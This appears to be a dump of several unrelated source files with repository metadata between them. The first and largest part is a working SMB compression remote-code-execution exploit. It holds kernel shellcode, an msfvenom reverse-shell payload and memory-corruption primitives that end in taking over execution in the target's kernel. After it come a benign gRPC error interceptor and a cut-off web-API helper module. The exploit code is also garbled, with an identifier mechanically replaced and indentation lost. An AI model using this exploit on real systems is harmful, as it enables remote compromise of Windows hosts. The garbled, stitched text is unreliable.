KERNEL_SHELLCODE += b"\x4D\x8B\x4D\x38\x49\x81\xE8\xF8\x02\x00\x00\x48\x31\xF6\x49\x81"
KERNEL_SHELLCODE += b"\xE9\xF8\x02\x00\x00\x41\x8B\x79\x74\x0F\xBA\xE7\x04\x73\x05\x4C"
KERNEL_SHELLCODE += b"\x89\xCE\xEB\x0C\x4D\x39\xC8\x4D\x8B\x89\x00\x03\x00\x00\x75\xDE"
KERNEL_SHELLCODE += b"\x48\x85\xF6\x74\x49\x49\x8D\x4E\x10\x48\x89\xF2\x4D\x31\xC0\x4C"
KERNEL_SHELLCODE += b"\x8D\x0D\xC2\x00\x00\x00\x52\x41\x50\x41\x50\x41\x50\xBF\xC4\x5C"
KERNEL_SHELLCODE += b"\x19\x6D\x48\x83\xEC\x20\xE8\x38\x00\x00\x00\x48\x83\xC4\x40\x49"
KERNEL_SHELLCODE += b"\x8D\x4E\x10\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xB8\x05\x00\x00"
KERNEL_SHELLCODE += b"\x00\x44\x0F\x22\xC0\xE8\x19\x00\x00\x00\x48\x83\xC4\x20\xFA\x48"
KERNEL_SHELLCODE += b"\x89\xD8\x5F\x5E\x5B\x5A\x59\x41\x5E\x41\x5F\x41\x5D\x41\x59\x41"
KERNEL_SHELLCODE += b"\x58\xFF\xE0\xE8\x02\x00\x00\x00\xFF\xE0\x53\x51\x56\x41\x8B\x47"
KERNEL_SHELLCODE += b"\x3C\x4C\x01\xF8\x8B\x80\x88\x00\x00\x00\x4C\x01\xF8\x50\x8B\x48"
KERNEL_SHELLCODE += b"\x18\x8B\x58\x20\x4C\x01\xFB\xFF\xC9\x8B\x34\x8B\x4C\x01\xFE\xE8"
KERNEL_SHELLCODE += b"\x1F\x00\x00\x00\x39\xF8\x75\xEF\x58\x8B\x58\x24\x4C\x01\xFB\x66"
KERNEL_SHELLCODE += b"\x8B\x0C\x4B\x8B\x58\x1C\x4C\x01\xFB\x8B\x04\x8B\x4C\x01\xF8\x5E"
KERNEL_SHELLCODE += b"\x59\x5B\xC3\x52\x31\xC0\x99\xAC\xC1\xCA\x0D\x01\xC2\x85\xC0\x75"
KERNEL_SHELLCODE += b"\xF6\x92\x5A\xC3\xE8\xA1\xFF\xFF\xFF\x80\x78\x02\x80\x77\x05\x0F"
KERNEL_SHELLCODE += b"\xB6\x40\x03\xC3\x8B\x40\x03\xC3\x41\x57\x41\x56\x57\x56\x48\x8B"
KERNEL_SHELLCODE += b"\x05\x12\x01\x00\x00\x48\x8B\x48\x18\x48\x8B\x49\x20\x48\x8B\x09"
KERNEL_SHELLCODE += b"\x66\x83\x79\x48\x18\x75\xF6\x48\x8B\x41\x50\x81\x78\x0C\x33\x00"
KERNEL_SHELLCODE += b"\x32\x00\x75\xE9\x4C\x8B\x79\x20\xBF\x5E\x51\x5E\x83\xE8\x58\xFF"
KERNEL_SHELLCODE += b"\xFF\xFF\x49\x89\xC6\x4C\x8B\x3D\xD3\x00\x00\x00\x31\xC0\x44\x0F"
KERNEL_SHELLCODE += b"\x22\xC0\x48\x8D\x15\x96\x01\x00\x00\x89\xC1\x48\xF7\xD1\x49\x89"
KERNEL_SHELLCODE += b"\xC0\xB0\x40\x50\xC1\xE0\x06\x50\x49\x89\x01\x48\x83\xEC\x20\xBF"
KERNEL_SHELLCODE += b"\xEA\x99\x6E\x57\xE8\x1A\xFF\xFF\xFF\x48\x83\xC4\x30\x48\x8B\x3D"
KERNEL_SHELLCODE += b"\x6B\x01\x00\x00\x48\x8D\x35\x77\x00\x00\x00\xB9\x1D\x00\x00\x00"
KERNEL_SHELLCODE += b"\xF3\xA4\x48\x8D\x35\x6E\x01\x00\x00\xB9\x58\x02\x00\x00\xF3\xA4"
KERNEL_SHELLCODE += b"\x48\x8D\x0D\xE0\x00\x00\x00\x65\x48\x8B\x14\x25\x88\x01\x00\x00"
KERNEL_SHELLCODE += b"\x4D\x31\xC0\x4C\x8D\x0D\x46\x00\x00\x00\x41\x50\x6A\x01\x48\x8B"
KERNEL_SHELLCODE += b"\x05\x2A\x01\x00\x00\x50\x41\x50\x48\x83\xEC\x20\xBF\xC4\x5C\x19"
KERNEL_SHELLCODE += b"\x6D\xE8\xBD\xFE\xFF\xFF\x48\x83\xC4\x40\x48\x8D\x0D\xA6\x00\x00"
KERNEL_SHELLCODE += b"\x00\x4C\x89\xF2\x4D\x31\xC9\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20"
KERNEL_SHELLCODE += b"\xE8\x9E\xFE\xFF\xFF\x48\x83\xC4\x20\x5E\x5F\x41\x5E\x41\x5F\xC3"
KERNEL_SHELLCODE += b"\x90\xC3\x48\x92\x31\xC9\x51\x51\x49\x89\xC9\x4C\x8D\x05\x0D\x00"
KERNEL_SHELLCODE += b"\x00\x00\x89\xCA\x48\x83\xEC\x20\xFF\xD0\x48\x83\xC4\x30\xC3\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x00"
KERNEL_SHELLCODE += b"\x00\x00\x00\x00\x00\x00\x00"
# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit?
USER_PAYLOAD = b""
USER_PAYLOAD += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xcc\x00\x00\x00"
USER_PAYLOAD += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
USER_PAYLOAD += b"\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
USER_PAYLOAD += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
USER_PAYLOAD += b"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1"
USER_PAYLOAD += b"\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
USER_PAYLOAD += b"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00"
USER_PAYLOAD += b"\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48"
USER_PAYLOAD += b"\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0"
USER_PAYLOAD += b"\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d"
USER_PAYLOAD += b"\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1"
USER_PAYLOAD += b"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75"
USER_PAYLOAD += b"\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
USER_PAYLOAD += b"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48"
USER_PAYLOAD += b"\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
USER_PAYLOAD += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59"
USER_PAYLOAD += b"\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77"
USER_PAYLOAD += b"\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48"
USER_PAYLOAD += b"\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x48\x31\xc0\x50"
USER_PAYLOAD += b"\x50\x49\xc7\xc4\x02\x00\x0d\x05\x41\x54\x49\x89\xe4"
USER_PAYLOAD += b"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89"
USER_PAYLOAD += b"\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00"
USER_PAYLOAD += b"\xff\xd5\x6a\x02\x59\x50\x50\x4d\x31\xc9\x4d\x31\xc0"
USER_PAYLOAD += b"\x48\xff\xc0\x48\x89\xc2\x41\xba\xea\x0f\xdf\xe0\xff"
USER_PAYLOAD += b"\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89"
USER_PAYLOAD += b"\xf9\x41\xba\xc2\xdb\x37\x67\xff\xd5\x48\x31\xd2\x48"
USER_PAYLOAD += b"\x89\xf9\x41\xba\xb7\xe9\x38\xff\xff\xd5\x4d\x31\xc0"
USER_PAYLOAD += b"\x48\x31\xd2\x48\x89\xf9\x41\xba\x74\xec\x3b\xe1\xff"
USER_PAYLOAD += b"\xd5\x48\x89\xf9\x48\x89\xc7\x41\xba\x75\x6e\x4d\x61"
USER_PAYLOAD += b"\xff\xd5\x48\x81\xc4\xb0\x02\x00\x00\x48\x83\xec\x10"
USER_PAYLOAD += b"\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9"
USER_PAYLOAD += b"\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48\x83\xc4\x20\x5e"
USER_PAYLOAD += b"\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58"
USER_PAYLOAD += b"\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53\xe5\xff"
USER_PAYLOAD += b"\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89\xf0"
USER_PAYLOAD += b"\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff"
USER_PAYLOAD += b"\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41"
USER_PAYLOAD += b"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56"
USER_PAYLOAD += b"\xff\xd5"
PML4_SELFREF = 0
PHAL_HEAP = 0
PHALP_INTERRUPT = 0
PHALP_APIC_INTERRUPT = 0
PNT_ENTRY = 0
max_read_retry = 3
overflow_val = 0x1100
write_unit = 0xd0
pmdl_va = KUSER_SHARED_DATA + 0x900
pmdl_mapva = KUSER_SHARED_DATA + 0x800
pshellcodeva = KUSER_SHARED_DATA + 0x950
class MDL:
def __init__(self, map_va, phys_addr):
self.next = struct.pack("<Q", 0x0)
self.size = struct.pack("<H", 0x40)
self.mdl_flags = struct.pack("<H", 0x5004)
self.alloc_processor = struct.pack("<H", 0x0)
self.reserved = struct.pack("<H", 0x0)
self.process = struct.pack("<Q", 0x0)
self.map_va = struct.pack("<Q", map_va)
map_va &= ~0xFFF
self.start_va = struct.pack("<Q", map_va)
self.byte_count = struct.pack("<L", 0x1100)
self.byte_offset = struct.pack("<L", (phys_addr & 0xFFF) + 0x4)
phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12
self.phys_addr1 = struct.pack("<Q", phys_addr_enc)
self.phys_addr2 = struct.pack("<Q", phys_addr_enc)
self.phys_addr3 = struct.pack("<Q", phys_addr_enc)
def raw_bytes(self):
mdl_bytes = self.next + self.size + self.mdl_flags + \
self.alloc_processor + self.reserved + self.process + \
self.map_va + self.start_va + self.byte_count + \
self.byte_offset + self.phys_addr1 + self.phys_addr2 + \
self.phys_addr3
return mdl_bytes
def reconnect(ip, port):
sock = socket.socket(socket.AF_INET)
sock.settimeout(7)
sock.connect((ip, port))
return sock
def write_primitive(ip, port, data, addr):
sock = reconnect(ip, port)
smb_negotiate(sock)
sock.recv(1000)
uncompressed_data = b"\x41"*(overflow_val - len(data))
uncompressed_data += b"\x00"*PNET_RAW_USER_PAYLOADF_OFFSET
uncompressed_data += struct.pack('<Q', addr)
compressed_data = compress(uncompressed_data)
smb_compress(sock, compressed_data, 0xFFFFFFFF, data)
sock.close()
def write_srvnet_USER_PAYLOADfer_hdr(ip, port, data, offset):
sock = reconnect(ip, port)
smb_negotiate(sock)
sock.recv(1000)
compressed_data = compress_evil(data)
dummy_data = b"\x33"*(overflow_val + offset)
smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data)
sock.close()
def read_physmem_primitive(ip, port, phys_addr):
i = 0
while i < max_read_retry:
i += 1
USER_PAYLOADf = try_read_physmem_primitive(ip, port, phys_addr)
if USER_PAYLOADf is not None:
return USER_PAYLOADf
def try_read_physmem_primitive(ip, port, phys_addr):
fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes()
write_primitive(ip, port, fake_mdl, pmdl_va)
write_srvnet_USER_PAYLOADfer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET)
i = 0
while i < max_read_retry:
i += 1
sock = reconnect(ip, port)
smb_negotiate(sock)
USER_PAYLOADf = sock.recv(1000)
sock.close()
if USER_PAYLOADf[4:8] != b"\xfeSMB":
return USER_PAYLOADf
def get_phys_addr(ip, port, va_addr):
pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))
pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))
pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))
pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))
pml4e = PML4 + pml4_index*0x8
pdpt_USER_PAYLOADf = read_physmem_primitive(ip, port, pml4e)
if pdpt_USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed")
pdpt = struct.unpack("<Q", pdpt_USER_PAYLOADf[0:8])[0] & 0xFFFFF000
pdpte = pdpt + pdpt_index*0x8
pdt_USER_PAYLOADf = read_physmem_primitive(ip, port, pdpte)
if pdt_USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed")
pdt = struct.unpack("<Q", pdt_USER_PAYLOADf[0:8])[0] & 0xFFFFF000
pdte = pdt + pdt_index*0x8
pt_USER_PAYLOADf = read_physmem_primitive(ip, port, pdte)
if pt_USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed")
pt = struct.unpack("<Q", pt_USER_PAYLOADf[0:8])[0]
if pt & (1 << (8 - 1)):
phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF)
return phys_addr
else:
pt = pt & 0xFFFFF000
pte = pt + pt_index*0x8
pte_USER_PAYLOADf = read_physmem_primitive(ip, port, pte)
if pte_USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed")
phys_addr = (struct.unpack("<Q", pte_USER_PAYLOADf[0:8])[0] & 0xFFFFF000) + \
(va_addr & 0xFFF)
return phys_addr
def get_pte_va(addr):
pt = addr >> 9
lb = (0xFFFF << 48) | (PML4_SELFREF << 39)
ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) +
0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8
pt = pt | lb
pt = pt & ub
return pt
def overwrite_pte(ip, port, addr):
phys_addr = get_phys_addr(ip, port, addr)
USER_PAYLOADf = read_physmem_primitive(ip, port, phys_addr)
if USER_PAYLOADf is None:
sys.exit("[-] read primitive failed!")
pte_val = struct.unpack("<Q", USER_PAYLOADf[0:8])[0]
# Clear NX bit
overwrite_val = pte_val & (((1 << 63) - 1))
overwrite_USER_PAYLOADf = struct.pack("<Q", overwrite_val)
write_primitive(ip, port, overwrite_USER_PAYLOADf, addr)
def build_shellcode():
global KERNEL_SHELLCODE
KERNEL_SHELLCODE += struct.pack("<Q", PHALP_INTERRUPT +
HALP_APIC_REQ_INTERRUPT_OFFSET)
KERNEL_SHELLCODE += struct.pack("<Q", PHALP_APIC_INTERRUPT)
KERNEL_SHELLCODE += USER_PAYLOAD
def search_hal_heap(ip, port):
global PHALP_INTERRUPT
global PHALP_APIC_INTERRUPT
search_len = 0x10000
index = PHAL_HEAP
page_index = PHAL_HEAP
cons = 0
phys_addr = 0
while index < PHAL_HEAP + search_len:
# It seems that pages in the HAL heap are not necessarily contiguous in physical memory,
# so we try to reduce number of reads like this
if not (index & 0xFFF):
phys_addr = get_phys_addr(ip, port, index)
else:
phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF)
USER_PAYLOADf = read_physmem_primitive(ip, port, phys_addr)
if USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed!")
entry_indices = 8*(((len(USER_PAYLOADf) + 8 // 2) // 8) - 1)
i = 0
# This heuristic seems to be OK to find HalpInterruptController, but could use improvement
while i < entry_indices:
entry = struct.unpack("<Q", USER_PAYLOADf[i:i+8])[0]
i += 8
if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000:
cons = 0
continue
cons += 1
if cons > 3:
PHALP_INTERRUPT = index + i - 0x40
print("[+] found HalpInterruptController at %lx"
% PHALP_INTERRUPT)
if len(USER_PAYLOADf) < i + 0x40:
USER_PAYLOADf = read_physmem_primitive(ip, port, phys_addr + i + 0x38)
PHALP_APIC_INTERRUPT = struct.unpack("<Q", USER_PAYLOADf[0:8])[0]
if USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed!")
else:
PHALP_APIC_INTERRUPT = struct.unpack("<Q",USER_PAYLOADf[i + 0x38:i+0x40])[0]
print("[+] found HalpApicRequestInterrupt at %lx" % PHALP_APIC_INTERRUPT)
return
index += entry_indices
sys.exit("[-] failed to find HalpInterruptController!")
def search_selfref(ip, port):
search_len = 0x1000
index = PML4
while search_len:
USER_PAYLOADf = read_physmem_primitive(ip, port, index)
if USER_PAYLOADf is None:
return
entry_indices = 8*(((len(USER_PAYLOADf) + 8 // 2) // 8) - 1)
i = 0
while i < entry_indices:
entry = struct.unpack("<Q",USER_PAYLOADf[i:i+8])[0] & 0xFFFFF000
if entry == PML4:
return index + i
i += 8
search_len -= entry_indices
index += entry_indices
def find_pml4_selfref(ip, port):
global PML4_SELFREF
self_ref = search_selfref(ip, port)
if self_ref is None:
sys.exit("[-] failed to find PML4 self reference entry!")
PML4_SELFREF = (self_ref & 0xFFF) >> 3
print("[+] found PML4 self-ref entry %0x" % PML4_SELFREF)
def find_low_stub(ip, port):
global PML4
global PHAL_HEAP
limit = 0x100000
index = 0x1000
while index < limit:
USER_PAYLOADf = read_physmem_primitive(ip, port, index)
if USER_PAYLOADf is None:
sys.exit("[-] physical read primitive failed!")
entry = struct.unpack("<Q", USER_PAYLOADf[0:8])[0] & 0xFFFFFFFFFFFF00FF
if entry == LOWSTUB_JMP:
print("[+] found low stub at phys addr %lx!" % index)
PML4 = struct.unpack("<Q", USER_PAYLOADf[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0]
print("[+] PML4 at %lx" % PML4)
PHAL_HEAP = struct.unpack("<Q", USER_PAYLOADf[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000
print("[+] base of HAL heap at %lx" % PHAL_HEAP)
return
index += 0x1000
sys.exit("[-] Failed to find low stub in physical memory!")
def do_rce(ip, port):
find_low_stub(ip, port)
find_pml4_selfref(ip, port)
search_hal_heap(ip, port)
build_shellcode()
print("[+] built shellcode!")
pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA)
print("[+] KUSER_SHARED_DATA PTE at %lx" % pKernelUserSharedPTE)
overwrite_pte(ip, port, pKernelUserSharedPTE)
print("[+] KUSER_SHARED_DATA PTE NX bit cleared!")
# TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function.
to_write = len(KERNEL_SHELLCODE)
write_bytes = 0
while write_bytes < to_write:
write_sz = min([write_unit, to_write - write_bytes])
write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes)
write_bytes += write_sz
print("[+] Wrote shellcode at %lx!" % pshellcodeva)
input("[+] Press a key to execute shellcode!")
write_primitive(ip, port, struct.pack("<Q", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET)
print("[+] overwrote HalpInterruptController pointer, should have execution shortly...")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-ip", help="IP address of target", required=True)
parser.add_argument("-p", "--port", default=445, help="SMB port, \
default: 445", required=False, type=int)
args = parser.parse_args()
do_rce(args.ip, args.port)
|
[
"noreply@github.com"
] |
ww6453.noreply@github.com
|
7a34a4fdfc88f0e171da67b11b861052b765533f
|
dc36e50bf32db3229c4e932e27cad9126451dec6
|
/interceptors.py
|
1bc83f894ecd8215092dba14e6895fb29373f27f
|
[
"Apache-2.0"
] |
permissive
|
ilyde-platform/ilyde-jobs
|
ca565b2d8f16dc0e191f66e03b49afc4473642c0
|
3b272dfe45c498f8e5cbc34a3b2be7d564885d8d
|
refs/heads/main
| 2023-05-14T14:30:47.073807
| 2021-05-28T09:47:50
| 2021-05-28T09:47:50
| 352,955,697
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,068
|
py
|
# encoding: utf-8
#
# Copyright (c) 2020-2021 Hopenly srl.
#
# This file is part of Ilyde.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from typing import Callable, Any
from google.protobuf import any_pb2
from grpc_interceptor import ServerInterceptor
from grpc_interceptor.exceptions import GrpcException, InvalidArgument, NotFound, Unknown
import grpc
import marshmallow
import mongoengine
# setup logger
FORMAT = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
logger = logging.getLogger(__name__)
class ExceptionToStatusInterceptor(ServerInterceptor):
def intercept(
self,
method: Callable,
request: Any,
context: grpc.ServicerContext,
method_name: str,
) -> Any:
"""Override this method to implement a custom interceptor.
You should call method(request, context) to invoke the
next handler (either the RPC method implementation, or the
next interceptor in the list).
Args:
method: The next interceptor, or method implementation.
request: The RPC request, as a protobuf message.
context: The ServicerContext pass by gRPC to the service.
method_name: A string of the form
"/protobuf.package.Service/Method"
Returns:
This should generally return the result of
method(request, context), which is typically the RPC
method response, as a protobuf message. The interceptor
is free to modify this in some way, however.
"""
try:
return method(request, context)
except GrpcException as e:
context.set_code(e.status_code)
context.set_details(e.details)
logger.error(e.details)
return any_pb2.Any()
except marshmallow.ValidationError as e:
context.set_code(InvalidArgument.status_code)
msg = ' '.join(["%s: %s" % (key, str(value)) for key, value in e.messages.items()])
context.set_details(msg)
logger.error(e)
return any_pb2.Any()
except mongoengine.errors.DoesNotExist as e:
context.set_code(NotFound.status_code)
context.set_details(str(e))
logger.error(str(e))
return any_pb2.Any()
except Exception as e:
context.set_code(Unknown.status_code)
context.set_details(str(e))
logger.error(str(e))
return any_pb2.Any()
|
[
"tony.wilson@hopenly.com"
] |
tony.wilson@hopenly.com
|
0a194bbc1f44a56f7bcabf7b470ef4d309b0de4b
|
6b629453f455ef6525a157dbc169a14484afebdc
|
/api/other_apis.py
|
8c3703b51ea93111ff117d33ffcebbaf89ea20fb
|
[
"MIT"
] |
permissive
|
ashleymeah/pinybot
|
4bbdf8c4e04fde318490e90700f59c6fe0d9bb4d
|
54bc75e894d46c09a9b6ff32644dbe07d225f4ba
|
refs/heads/master
| 2021-01-18T13:22:30.606169
| 2016-08-18T17:10:32
| 2016-08-18T17:10:32
| 65,678,969
| 2
| 0
| null | 2016-08-16T18:51:58
| 2016-08-14T17:49:36
|
Python
|
UTF-8
|
Python
| false
| false
| 15,404
|
py
|
# -*- coding: utf-8 -*-
# Provides functions to search/explore various APIs i.e. urbandictionary,
# worldweatheronline , ip-api and api.icndb & many others.
# Includes BeautifulSoup parsed APIs/websites functions.
import web_request
import unicodedata
import random
try:
from bs4 import BeautifulSoup
except ImportError:
BeautifulSoup = None
if BeautifulSoup is not None:
try:
import wikipedia # Is reliant on BeautifulSoup to be present
except ImportError:
wikipedia = None
# A storage for API keys if required; add to this dictionary if you intend to use
# more keys
API_KEYS = {'weather': ''}
def urbandictionary_search(search):
"""
Searches Urban-dictionary's API for a given search term.
:param search: The search term str to search for.
:return: definition str or None on no match or error.
"""
if str(search).strip():
urban_api_url = 'http://api.urbandictionary.com/v0/define?term=%s' % search
response = web_request.get_request(urban_api_url, json=True)
if response:
try:
definition = response['content']['list'][0]['definition']
return str(definition.encode('ascii', 'ignore'))
except KeyError:
return None
except IndexError:
return None
else:
return None
# TODO: Adjust to a new API for weather retrieval.
def weather_search(city):
"""
Searches worldweatheronline's API for weather data for a given city.
You must have a working API key to be able to use this function.
:param city: The city str to search for.
:return: weather data str or None on no match or error.
"""
if str(city).strip():
api_key = API_KEYS['weather'] # A valid API key.
if not api_key:
return False
else:
weather_api_url = 'http://api.worldweatheronline.com/free/v2/weather.ashx?' \
'q=%s&format=json&key=%s' % (city, api_key)
response = web_request.get_request(weather_api_url, json=True)
if response['content'] is not None:
try:
pressure = response['content']['data']['current_condition'][0]['pressure']
temp_c = response['content']['data']['current_condition'][0]['temp_C']
temp_f = response['content']['data']['current_condition'][0]['temp_F']
query = response['content']['data']['request'][0]['query'].encode('ascii', 'ignore')
result = query + '. Temperature: ' + temp_c + 'C (' + temp_f + 'F) Pressure: ' + pressure + ' millibars'
return result
except (IndexError, KeyError):
return None
else:
return None
def whois(ip):
"""
Searches ip-api for information about a given IP.
:param ip: The ip str to search for.
:return: information str or None on error.
"""
if str(ip).strip():
url = 'http://ip-api.com/json/%s' % ip
json_data = web_request.get_request(url, json=True)
try:
city = json_data['content']['city']
country = json_data['content']['country']
isp = json_data['content']['isp']
org = json_data['content']['org']
region = json_data['content']['regionName']
zipcode = json_data['content']['zip']
info = country + ', ' + city + ', ' + region + ', *Zipcode*: ' + zipcode + ' *ISP*: ' + isp + '/' + org
return info
except KeyError:
return None
else:
return None
# TODO: Implement categories, and character name functionality.
def chuck_norris():
"""
Finds a random Chuck Norris joke/quote from http://www.icndb.com/api/ .
The API also has category specifications, i.e. categories are either "nerdy"/"explicit" set via webform "?limtTo".
The character names can also be altered via passing the webform "?firstName=[name]" or "?lastName=[name]".
:return: joke str or None on failure.
"""
url = 'http://api.icndb.com/jokes/random/?escape=javascript'
json_data = web_request.get_request(url, json=True)
if json_data['content']['type'] == 'success':
joke = json_data['content']['value']['joke'].decode('string_escape')
return joke
else:
return None
def yo_mama_joke():
"""
Retrieves a random 'Yo Mama' joke from an API.
:return: joke str or None on failure.
"""
url = 'http://api.yomomma.info/'
json_data = web_request.get_request(url, json=True)
if json_data['content']:
joke = json_data['content']['joke'].decode('string_escape')
return joke
else:
return None
def online_advice():
"""
Retrieves a random string of advice from an API.
:return: advice str or None on failure.
"""
url = 'http://api.adviceslip.com/advice'
json_data = web_request.get_request(url, json=True)
if json_data['content']:
advice = json_data['content']['slip']['advice'].decode('string_escape')
return str(advice)
else:
return None
# TODO: Needs a more clearer and succinct output.
def duckduckgo_search(search):
"""
Search DuckDuckGo using their API - https://duckduckgo.com/api .
NOTE: This is currenly limited to definition as of now.
:param search: The search term str to search for.
:return: definition str or None on no match or error.
"""
if str(search).strip():
ddg_api = 'https://api.duckduckgo.com/?q=%s&format=json' % search
response = web_request.get_request(ddg_api, json=True)
definitions = []
if response:
# Return up to 2 definition results.
for x in range(2):
definition = response['content']['RelatedTopics'][x]['Text']
# The search word is stripped from the definition result by default.
definitions.append(definition.encode('ascii', 'ignore').strip(search))
return definitions
else:
return None
# TODO: The functions use needs to be redefined and needs to be referred to the original library.
def wiki_search(search=None):
"""
Requires Wikipedia module; pip install wikipedia.
:param search: str The search term to search for.
:return: Wikipedia summary or None if nothing found.
"""
if BeautifulSoup is not None:
if wikipedia is not None:
raise NotImplementedError('Wikipedia functionality is yet to be integrated as a function.')
# wiki_content = wikipedia.summary(search, sentences=2)
# return wiki_content
else:
return False
def omdb_search(search):
"""
Query the OMDb API - https://omdbapi.com/
:param search: Search term
:return: Title, rating, and short description
"""
if str(search).strip():
omdb_url = 'http://www.omdbapi.com/?t=%s&plot=short&r=json' % search
response = web_request.get_request(omdb_url, json=True)
if response:
try:
title = response['content']['Title']
plot = response['content']['Plot']
imdbid = response['content']['imdbID']
imdbrating = response['content']['imdbRating']
if len(plot) >= 160:
plot_parts = plot.split('.')
omdb_info = '*Title:* ' + title + '\nDetails: ' + plot_parts[0] + '\n*Rating: *' + imdbrating +\
